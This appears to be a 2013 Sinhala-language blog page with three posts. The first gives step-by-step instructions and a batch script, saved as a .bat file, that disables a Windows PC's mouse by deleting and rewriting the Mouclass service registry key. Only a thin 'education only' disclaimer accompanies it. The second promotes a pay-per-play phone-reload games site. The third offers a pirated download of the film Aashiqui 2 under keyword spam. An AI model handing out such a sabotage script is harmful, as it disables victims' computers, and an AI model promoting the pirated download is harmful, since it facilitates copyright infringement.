Mouse එකට කෙලවෙන්න Virus එකක් හදමුද?- Make a virus that disable Mouse

(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)

හරි එහෙනම් වැඩේ පටා...න් ගමු නේද.එහෙනම් වෙනදා වගේ  Notepad එක Open කරගෙන වැඩේට ලෑස්ති වෙන්න්කෝ.

01.මුලින්ම Notepad එක Open කරගන්න දන්නැත්තම් මෙහෙම යන්න. Start-Allprogarm-Accessories-Notepad

02.දැන් මං පහලින් දාලා තියෙන  Code ටික Notepad එකට Copy/past කරන්න.

03.දැන් Save as ගිහින් Mouse.bat කියල ගහලා Save කරගන්න.

04.අන්තිමට .bat කියලා ගහන්න ඕනි.Mouse කියන තැනට ඕයාලා කැමති නමක් දාගෙන Save කරගන්න.

මෙන්න කෝඩ් ටික

rem ---------------------------------
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

(මේ සියලුම දෙවල් අධ්‍යාපනය සදහා පමනි...)

ගේම් ගහලා Phone එකට Reload දාගන්න කැමතිද?


අද නම් කියන්න යන්නේ ටිකක් අමුතු කතාවක්,ඒ තමයි අපි ඔය නිකමට වගේ Online ගේම්ස් ගහනවනේ ඉතිං නිකන් ගේම් ගහනවට වඩා හොද නැද්ද ගේම් ගහන අතරතුර ගෙදරට බරක් නොවී මාසේ අන්තිමට එන ඉන්ටර්නෙට් බිලවත් ගෙවා ගන්න එක,මං නම් ඔය නිකන් ඉන්න වෙලාවට Online Games ගහනවා.ඒත් මේ ක්‍රමේ හොයාගත්තට පස්සෙ ගේම් ගහන්න තියෙන අශාව තවත් වැඩිවුනා.
හරි ඕවගෙන් වැඩක් නෑ මං කියන්නම් කොහොමද රී ලෝඩ් එක දාගන්නෙ කියලා ඒ සදහා පහත පියවරයන් අනුගමනය කරන්න.

01.මුලින්ම මං පහලින් දාලා තියෙන Website එකට යන්න.
02.දැන්  Register යන්න Click කරන්න (මේකෙදි හරි විස්තර දෙන්න,Phone Number එකට +94xxxxxxxxx මෙතනට (X) කියන තැනට ඔයාගේ Phone Number එක දාන්න)
දැන් හරි ඔයාලා කැමති ගේම් එකක් අරගෙන Play කරන්න,මේකේ Register වෙනකොට Rs.03 හම්බවෙනවා (හැබැයි මට නම් හම්බවුනේ Rs.01 :( දුක තමා ඉතිං)Rs.10 හම්බ උනාම ඔයාලගේ Phone එකට Reload එක දාගන්න පුලුවන්.
මෙන්න මෙහෙමයි Site එකේ කියලා තියෙන්නේ
01.PLAY GAMES ,FILL YOUR WALLET & GET YOUR RECHARGE.
02.Get Rs 3 as a Joining Bonus
03.Minimum recharge is Rs.10 
04.To Increase your Earnings, you need to Do:
-- Play a Single Game for At least 5 minutes and GET 10 paise.
-- AFTER 5 minutes PRESS OK button from the popup & GET another 10 paise & repeat this to Fill WALLET.
05.To redeem your Earnings, you need to have a minimum balance of Rs. 10 in your wallet.
06.You can redeem your earnings for FREE mobile recharges only.
07.Your earnings are non-transferable and you cannot opt for cash in lieu of your earnings or ask for an alternative product.
ඉතිං මේ වැඩේ දිගටම කරගෙන ගියොත් Reload කඩයක් උනත් කරගෙන යන්න පුලුවන් නේද?.hikz...

Aashiqui 2 (2013) Full Movie එක ඕනිද?

 Aashiqui 2 (2013) Full Movie Download In HD
ඔයාලා දන්නවනේ ගොඩාක් ජනප්‍රිය වුනු මේ සිංදු දෙක (Sun Raha Hai,Sun Raha Hai) අන්න මේ සිංදු දෙක ඇතුලත් Movie එක තමයි මං අද ඔයාලට දෙන්න හදන්නෙ. මේ Movie ඒකේ කොටස් 4ක් තියෙනවා කිසි ගින්නක් නතුව Direct Download කර ගන්න පුලුවන්,සමහර වෙබ් අඩවි වල මං දැකලා තියෙන්වා විසිටර්ස් ලා වටේ යවනව ඉතිං ඒයාලටත් Site එක ඒපා වෙනවා.අපි එහෙම කරන්නෙ නැහැ,ඒ කොහොම වෙතත් ඔයාලට මේ Movie එක එක Click එකකින් Download කරගන්න අපි ඉඩ සලසා තියෙන්වා ඒ නිසා හරිම ලේසියි.Torrent එක ඕනිනම් කියන්න හොයලා දාන්නම්.එහෙනම් අපි ගියා....
Aashiqui 2 Full movie Details
  • Movie Name: Aashiqui 2 (2013) [BRRip]

  • Category: Bollywood Movies

  • Cast & Crew: Aditya Roy Kapoor, Shraddha Kapoor 

  • Director: Mohit Suri

  • Genre: Romance | Action

  • Description: Rahul loses his fans and fame due to alcoholism. But he then decides to turn a small time singer into a rising star.

  • Length: 132min

                                                                                               Part-01

                                                                                               Part-02

                                                                       Part-03

                                                                       Part-04
Key Words:
 Download full movie  Aashiqui 2 for free,  Aashiqui 2 free full movie, download full movie  Aashiqui 2 in high quality, full movie download  Aashiqui 2 in mp4, download full movie  Aashiqui 2 in 3gp for mobile, download full hindi movie  Aashiqui 2 for free, download full movie  Aashiqui 2 in dvd quality, full movie download  Aashiqui 2 in hd quality, download full new movie  Aashiqui 2, download full movie Aashiqui 2 in single link,HD print of full movie  Aashiqui 2 download, download full movie  Aashiqui 2 2013.

Incoming Search Terms:

How to download full movie  Aashiqui 2 for free,Download full movie  Aashiqui 2 with IDM,Full movie download  Aashiqui 2 in high quality,Download Full movie  Aashiqui 2 for mobile,How to download Full movie  Aashiqui 2 in HD,Download full movie  Aashiqui 2 in Hindi,Full movie Download  Aashiqui 2 In 1080p,Download full movie  Aashiqui 2 in 3gp,Full movie download  Aashiqui 2 in mp4,Download full Bollywood movie  Aashiqui 2,Good print movie  Aashiqui 2,Download full movie  Aashiqui 2 in good print,Aashiqui 2 (2013) Full Movie Download In HD,Aashiqui 2 (2013) Full Movie Download In HD


 
!!! [ ShuranthaSoft ] !!! © 2013. All Rights Reserved. Powered by Blogger
Top